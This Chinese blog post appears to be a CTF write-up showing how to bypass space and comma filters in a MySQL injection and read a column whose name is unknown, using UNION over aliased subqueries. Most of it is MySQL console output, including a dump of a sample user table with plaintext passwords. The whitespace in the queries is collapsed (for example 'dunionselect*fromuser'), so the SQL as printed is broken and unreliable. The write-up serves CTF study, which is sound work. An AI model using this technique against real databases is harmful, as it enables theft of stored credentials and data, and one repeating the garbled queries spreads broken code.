Mysql如何巧妙的绕过未知字段名详解
前言
本文介绍的是DDCTF第五题,绕过未知字段名的技巧,这里拿本机来操作了下,思路很棒也很清晰,分享给大家,下面来看看详细的介绍:
实现思路
题目过滤空格和逗号,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括号都可以绕过,逗号使用join绕过;
存放flag的字段名未知,information_schema.columns也将表名的hex过滤了,即获取不到字段名;这时可以利用联合查询,过程如下:
思想就是获取flag,让其在已知字段名下出现;
示例代码:
mysql>select(select1)a,(select2)b,(select3)c,(select4)d; +---+---+---+---+ |a|b|c|d| +---+---+---+---+ |1|2|3|4| +---+---+---+---+ 1rowinset(0.00sec) mysql>select*from(select1)a,(select2)b,(select3)c,(select4)d; +---+---+---+---+ |1|2|3|4| +---+---+---+---+ |1|2|3|4| +---+---+---+---+ 1rowinset(0.00sec) mysql>select*from(select1)a,(select2)b,(select3)c,(select4)dunionselect*fromuser; +---+-------+----------+-------------+ |1|2|3|4| +---+-------+----------+-------------+ |1|2|3|4| |1|admin|admin888|110@110.com| |2|test|test123|119@119.com| |3|cs|cs123|120@120.com| +---+-------+----------+-------------+ 4rowsinset(0.01sec) mysql>selecte.4from(select*from(select1)a,(select2)b,(select3)c,(select4)dunionselect*fromuser)e; +-------------+ |4| +-------------+ |4| |110@110.com| |119@119.com| |120@120.com| +-------------+ 4rowsinset(0.03sec) mysql>selecte.4from(select*from(select1)a,(select2)b,(select3)c,(select4)dunionselect*fromuser)elimit1offset3; +-------------+ |4| +-------------+ |120@120.com| +-------------+ 1rowinset(0.01sec) mysql>select*fromuserwhereid=1unionselect(selecte.4from(select*from(select1)a,(select2)b,(select3)c,(select4)d unionselect*fromuser)elimit1offset3)f,(select1)g,(select1)h,(select1)i; +-------------+----------+----------+-------------+ |id|username|password|email| +-------------+----------+----------+-------------+ |1|admin|admin888|110@110.com| |120@120.com|1|1|1| +-------------+----------+----------+-------------+ 2rowsinset(0.04sec)
总结
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对毛票票的支持。